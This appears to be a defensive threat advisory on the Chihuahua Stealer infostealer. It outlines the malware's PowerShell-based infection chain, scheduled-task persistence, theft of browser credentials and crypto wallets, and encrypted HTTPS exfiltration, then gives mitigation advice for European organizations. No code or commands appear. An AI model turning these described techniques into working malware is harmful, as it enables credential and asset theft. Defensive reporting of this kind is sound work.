Chihuahua Stealer is a newly identified .NET-based infostealer malware that demonstrates a sophisticated multi-stage infection and data exfiltration process. The initial infection vector involves an obfuscated PowerShell script distributed via Google Drive, which triggers a chain of payloads. This multi-stage execution approach enhances stealth and complicates detection. Persistence on infected systems is maintained through scheduled tasks, allowing the malware to survive reboots and maintain ongoing access. The primary objective of Chihuahua Stealer is to harvest sensitive information, specifically targeting browser data such as saved credentials, cookies, and autofill information, as well as extensions related to cryptocurrency wallets. This focus on crypto wallets highlights the malware’s intent to steal high-value digital assets. Data exfiltration is conducted securely and covertly: stolen data is compressed and encrypted using AES-GCM encryption implemented via Windows Cryptography Next Generation (CNG) APIs, ensuring confidentiality and integrity of the stolen information during transmission. The malware communicates with its command and control infrastructure over HTTPS, further masking its network traffic. To evade detection, Chihuahua Stealer employs multiple obfuscation techniques including Base64 encoding, hex-string obfuscation, and a thorough cleanup routine that removes traces of its execution. Each infected machine is assigned a unique identifier, facilitating targeted data collection and management by the attackers. The use of native Windows cryptographic APIs and scheduled jobs for persistence reflects a high level of technical sophistication uncommon in many commodity infostealers.

For European organizations, Chihuahua Stealer poses a significant threat primarily to entities with employees or systems that handle sensitive browser-stored credentials and cryptocurrency assets. The theft of browser data can lead to unauthorized access to corporate accounts, email, and internal systems, potentially resulting in data breaches, financial fraud, and identity theft. The targeting of crypto wallet extensions is particularly concerning for financial institutions, fintech companies, and enterprises involved in blockchain or cryptocurrency operations, as stolen wallet credentials can lead to direct financial losses. The malware’s stealth and persistence mechanisms increase the risk of prolonged undetected compromise, enabling attackers to conduct extended espionage or data theft campaigns. Additionally, the use of Google Drive as an infection vector may exploit trusted cloud services commonly used in European workplaces, increasing the likelihood of successful delivery. The encrypted exfiltration over HTTPS complicates network-based detection, requiring advanced monitoring capabilities. Overall, the malware could disrupt confidentiality and integrity of sensitive data, with moderate impact on availability due to its focus on data theft rather than destructive payloads.

European organizations should implement targeted defenses beyond generic controls: 1) Enhance email and cloud file sharing security by deploying advanced threat protection solutions capable of detecting obfuscated PowerShell scripts and multi-stage payloads, especially in Google Drive shared links. 2) Implement strict application whitelisting and PowerShell execution policies to restrict unauthorized script execution, including enforcing Constrained Language Mode and logging PowerShell activity for anomaly detection. 3) Deploy endpoint detection and response (EDR) solutions with behavioral analytics to identify persistence mechanisms such as scheduled tasks and unusual cryptographic API usage. 4) Monitor network traffic for anomalous HTTPS connections to unknown or suspicious domains, leveraging SSL/TLS inspection where privacy policies permit. 5) Educate users on risks associated with opening unsolicited links from cloud services and encourage verification of shared files. 6) Regularly audit browser extensions, particularly crypto wallet extensions, and enforce policies to limit installation to trusted sources. 7) Employ multi-factor authentication (MFA) on all critical accounts to mitigate the impact of credential theft. 8) Conduct frequent backups and maintain incident response plans tailored to data exfiltration scenarios. These measures collectively reduce the attack surface and improve detection and response capabilities against Chihuahua Stealer.